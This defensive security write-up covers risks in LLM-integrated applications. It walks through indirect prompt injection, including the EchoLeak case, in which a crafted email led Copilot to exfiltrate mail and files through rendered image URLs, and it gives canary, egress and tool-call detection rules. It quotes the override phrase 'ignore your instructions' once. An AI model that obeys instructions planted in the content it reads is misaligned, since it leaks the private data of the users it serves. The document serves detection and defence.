TL;DR for defenders. Treat every LLM in your stack as an untrusted component that will eventually follow someone else's instructions. There is no patch for prompt injection - the model reads instructions and data through the same channel, by design. What works: least-privilege tool scopes, output handling as strict as you'd apply to user input, breaking the data-exfiltration leg (egress controls on what the model can render or call), a canary token in the system prompt as a leak tripwire, and logging prompts, completions, and tool calls as first-class audit events. Details and starter detections below.
Why this belongs in your threat model now
LLM-integrated applications stopped being experimental the moment they got access to real data and real actions. The clearest proof point so far is EchoLeak (CVE-2025-32711, CVSS 9.3): a zero-click vulnerability in Microsoft 365 Copilot disclosed in June 2025, where a crafted email could make Copilot exfiltrate data from the user's context - mail, files, chat history - without the victim ever clicking anything. Microsoft fixed it server-side, but the underlying class (researchers called it an "LLM scope violation") is exactly what this writeup is about: untrusted content steering a model that holds privileged access.
This wasn't novel in kind. Indirect prompt injection against LLM-integrated applications was described systematically by Greshake et al. back in early 2023, and it has been the number-one entry in every edition of the OWASP Top 10 for LLM Applications since the list existed. The gap between "known since 2023" and "still shipping exploitable in 2025's flagship products" tells you how hard the problem is - and why detection and blast-radius design matter more than waiting for a fix.
The Top 10, in one defensive pass
The 2025 list in production terms - what each risk looks like in an app you actually run, and the primary defense:
| Risk | What it looks like in production | Primary defense |
|---|---|---|
LLM01 Prompt Injection | Untrusted content (user input, a retrieved doc, an email) steers the model's behavior | Least privilege + egress control; assume it happens |
LLM02 Sensitive Information Disclosure | Model reveals other users' data, internal docs, or credentials it was given | Data minimization; don't give the model secrets |
LLM03 Supply Chain | Poisoned or backdoored third-party model, adapter, or dataset | Pin versions, verify sources, inventory models like packages |
LLM04 Data & Model Poisoning | Attacker-influenced training or fine-tuning data changes behavior | Provenance and validation on anything you train on |
LLM05 Improper Output Handling | Model output flows into HTML, SQL, or a shell without encoding - classic injection, new source | Treat output as untrusted input; encode and parameterize |
LLM06 Excessive Agency | The model can call tools or APIs with more permission than the task needs | Scope tools per task; human approval for consequential actions |
LLM07 System Prompt Leakage | Instructions, and worse, any secrets inside them, get echoed out | No secrets in prompts; canary tripwire (below) |
LLM08 Vector & Embedding Weaknesses | RAG retrieval pulls attacker-planted or cross-tenant content into context | Access control at retrieval time, source tagging |
LLM09 Misinformation | Confident wrong answers drive real decisions | Grounding, citations, human review where it matters |
LLM10 Unbounded Consumption | Token-burning abuse: denial of service or a shocking bill | Rate limits, quotas, per-identity cost caps |
Notice the pattern: half of these are old vulnerability classes wearing a new interface.
LLM05 is unescaped output, LLM03 is supply chain, LLM10 is
resource exhaustion. Your existing instincts apply. The genuinely new ones are LLM01,
LLM06, and LLM08 - and they compound each other, which is where we go next.
Prompt injection, properly understood
SQL injection had a real fix: parameterized queries separate code from data. Prompt injection has no equivalent, because a transformer has one input channel. System prompt, user message, retrieved document, tool output - it's all tokens in the same context window, and the model's "instruction following" is a statistical tendency, not a security boundary. MITRE ATLAS catalogs this as AML.T0051, in two flavors that matter very differently for defense:
- Direct injection - the user attacks the model they're talking to ("ignore your instructions"). Mostly a content-policy and abuse problem; the attacker only holds their own session.
- Indirect injection - instructions hide in content the model processes on someone else's behalf: an email Copilot summarizes, a webpage an agent browses, a document RAG retrieves, a calendar invite. The victim never sees the payload. This is the one that turns into incidents, because the attacker reaches a session that isn't theirs.
A useful frame for when indirect injection becomes a real breach is what Simon Willison calls the lethal trifecta: an AI system that combines (1) access to private data, (2) exposure to untrusted content, and (3) a way to communicate externally. All three together means attacker instructions can reach private data and carry it out. EchoLeak was precisely this trifecta inside M365 Copilot - the crafted email was the untrusted content, the user's mail and files were the private data, and image/link rendering was the exfiltration channel. You usually can't remove legs one and two. Defense concentrates on leg three.
What you need flowing into your SIEM
You cannot detect what you don't log, and most LLM apps today log almost nothing security-relevant. Whether you build or buy, insist on these as structured, retained, queryable events:
- Prompts and completions, with user identity, session ID, model and version, and a hash of the system prompt in effect. Mind privacy: this is sensitive data; scope retention and access accordingly.
- Tool/function calls as first-class audit events - which tool, what arguments, triggered by which session, allowed or denied. For an agent, this is your process-creation log equivalent; it's where the impact happens.
- RAG retrieval events - which documents entered the context window, from which source, for which query. When an incident happens, "what did the model read" is the first question, and without this log it's unanswerable.
- Guardrail/filter verdicts - every block, flag, or rewrite from whatever safety layer you run, even when the request proceeds. These are your IDS alerts; today most of them go nowhere.
- If you're in the Microsoft ecosystem: Copilot interactions surface in the Purview unified audit log, and Azure OpenAI deployments can emit request logs through Azure diagnostics - check what you're actually collecting; the default is usually "not enough."
Detection strategy
Same philosophy as every UMBRASEC writeup: layers, from highest precision to broadest. Schemas below are illustrative - LLM apps don't share a standard log format yet, so adapt the field names to yours.
1. Canary token in the system prompt (near-zero false positives)
The honeypot-SPN trick, ported to LLMs. Plant a unique, meaningless marker in your system prompt and
alert if it ever appears in model output - because no legitimate completion has any reason to contain
it. One marker, two strong signals: your system prompt is leaking (LLM07), and the model
is disclosing context it was told not to - which often means an injection attempt is steering it.
# System prompt (excerpt)
# Integrity marker. Never include the following token in any response:
# UMB-CANARY-3f91c2a8
# Detection (pseudo-rule over completion logs)
alert when:
response.text contains "UMB-CANARY-"
severity: high
action: capture full session (prompt chain, retrieved docs, tool calls)
for review; rotate the canary after any hit
Tuning note. Use a random value per deployment, rotate it on a
schedule and after every hit, and make sure it's excluded from any prompt text you intentionally
publish. The same idea extends to RAG: seed a decoy document no honest query should retrieve, and
alert when it enters a context window - that's your honeypot for LLM08-style retrieval
abuse.
2. Egress: watch what the model is allowed to render or call
EchoLeak exfiltrated through a rendered image URL - the data left in the query string of a request the victim's client made automatically. That channel generalizes: markdown images, auto-fetched links, and tool calls that take URLs are the standard exfiltration legs of the trifecta. Lock them down by policy, and alert on the attempts:
# Output policy (enforce before rendering / before the HTTP client fires)
- strip or neutralize markdown images and links in model output
unless the host is on an explicit allowlist
- block tool calls whose URL/domain argument is not allowlisted
# Detection (pseudo-rule over output + tool-call logs)
alert when:
output.contains_image_or_link AND destination.host not in allowlist
or:
toolcall.name in ("http_get", "browse", "send_email")
AND toolcall.argument_domain not in allowlist
AND session.context_included_external_content == true
That last condition is the high-signal one: the model read untrusted content, then immediately tried to reach an unfamiliar destination. Legitimate sessions do this rarely; injected ones do it by construction.
3. Behavioral: tool-call fan-out and sequence anomalies
The agent equivalent of the Kerberoasting fan-out rule. A copilot answering a question touches one or two tools; a hijacked agent enumerates - reading many documents, then calling a send/export/write tool it rarely uses. Baseline per tool and per identity, then alert on the outliers:
# Pseudo-aggregation over tool-call logs
alert when, within 5m, a single session:
calls >= N distinct tools # fan-out (baseline N first)
or reads >= M distinct documents # bulk context-stuffing
or invokes a "consequential" tool # send_email, create_rule,
it has never used before # export, delete, payment
severity: medium - this is a triage feed, not a pager rule
Run it report-only for a couple of weeks exactly like a SIEM correlation rule: find your noisy legitimate automations, allowlist them, and set thresholds above your noisiest honest session.
Mitigation: design beats detection here
More than in any other writeup on this site, the architecture is the control. In order of impact:
- Scope tools to the task, not the product. A summarizer needs read access to one
document, not a mailbox-wide search tool and an email sender.
LLM06is a permissions decision you control completely, today. - Put a human between the model and consequential actions. Sending mail, moving money, changing configs, deleting data - require approval. Keep the approval UI honest: show the actual action and arguments, not the model's summary of them.
- Break the exfiltration leg. No unrestricted outbound fetches, no rendering remote images from model output, allowlisted domains for every tool that touches the network. If the trifecta can't complete, injection becomes much less interesting.
- Keep secrets out of prompts. System prompts leak - assume
LLM07- so API keys, internal hostnames, and customer data don't belong there. The canary should be the only "secret" in your prompt, and it's designed to leak loudly. - Treat model output as untrusted input (
LLM05): encode it before it hits HTML, parameterize it before it hits SQL, never pipe it to a shell. This one is fully solved technology; there's no excuse. - Inventory and pin your models like any other dependency (
LLM03), and put rate/cost limits on every endpoint (LLM10). - For the formal backing when you write policy: the joint NCSC/CISA Guidelines for Secure AI System Development and NIST's AI RMF map cleanly onto everything above.
Honest limitations
- There is no deterministic fix for prompt injection. Guardrail models and prompt
classifiers are probabilistic - useful as a filter layer, bypassable by a motivated attacker.
Anyone selling you a product that "solves" injection is selling you
LLM09. - The detections here are younger than the rest of this site's content. Windows eventing has decades of field testing; LLM telemetry has a couple of years and no standard schema. Expect to adapt everything to your own logging, and expect this writeup to age faster than the Kerberoasting one.
- The canary catches leakage, not all injection. An attack that quietly biases an answer, or exfiltrates without echoing the prompt, walks past rule #1. That's why the egress and behavioral layers exist, and why blast-radius design outranks all three.
- Vendor-hosted copilots limit your visibility. For M365 Copilot you get what Purview exposes, not raw model I/O. Push vendors on logging the same way you'd push a SaaS provider on audit APIs - it's the same ask.
References
- OWASP - Top 10 for LLM Applications (2025)
- MITRE ATLAS - AML.T0051: LLM Prompt Injection
- NVD - CVE-2025-32711 (M365 Copilot "EchoLeak" information disclosure)
- Microsoft MSRC - CVE-2025-32711 advisory
- The Hacker News - Zero-click "EchoLeak" AI vulnerability in Microsoft 365 Copilot, found by Aim Labs (Jun 2025)
- Greshake et al. - Not what you've signed up for: Compromising Real-World LLM-Integrated Applications with Indirect Prompt Injection (2023)
- Simon Willison - The lethal trifecta for AI agents (Jun 2025)
- NCSC / CISA - Guidelines for Secure AI System Development (Nov 2023)
- NIST - AI Risk Management Framework
Scope note. This is a defensive writeup. It describes injection classes only to the depth a defender needs to log, detect, and contain them - it deliberately contains no working injection payloads, jailbreak strings, or evasion techniques. UMBRASEC publishes defense, not offense.